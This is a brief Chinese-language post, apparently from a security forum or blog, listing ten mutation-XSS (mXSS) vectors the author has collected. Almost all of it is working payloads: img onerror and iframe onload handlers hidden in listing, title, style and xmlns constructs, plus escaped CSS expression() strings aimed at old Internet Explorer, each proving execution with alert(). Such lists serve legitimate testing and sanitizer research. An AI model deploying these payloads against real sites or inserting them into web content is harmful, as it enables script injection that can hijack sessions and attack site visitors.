一些 mXSS Vector
收集了蛮多的,扔10条出来,我好想当一条渗透狗远离XSS
<listing><img src=x onerror=alert(1)></listing>
<img src="test.jpg" alt ="``onload=alert(2)" />
<script>
x="<%";
</script>
<div title="%></script>"<img src=1 onerror=alert(3)>"></div>
<style/></style><img src=1 onerror=alert(4)></style>
<listing id=x><img src=1 onerror=alert(5)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
<title><img src=1 onerror=alert(6)></title> div.innerHTML = document.getElementsByTagName("title")[0]; // IE8, already-known?
<pkav xmlns="urn:img src=1 onerror=alert(7)//">123
<pkav xmlns="><iframe onload=alert(8)">123</pkav>
<p style="font-family:'ar\27 \3bx\3a expression\28alert\28 9\29\29\3bial';"></p>
<p style="font-family:'ar\27 \3bx\3a ex\5cpre\2f**\2fssion\28 alert\28 10\29\29\3bial';"></p>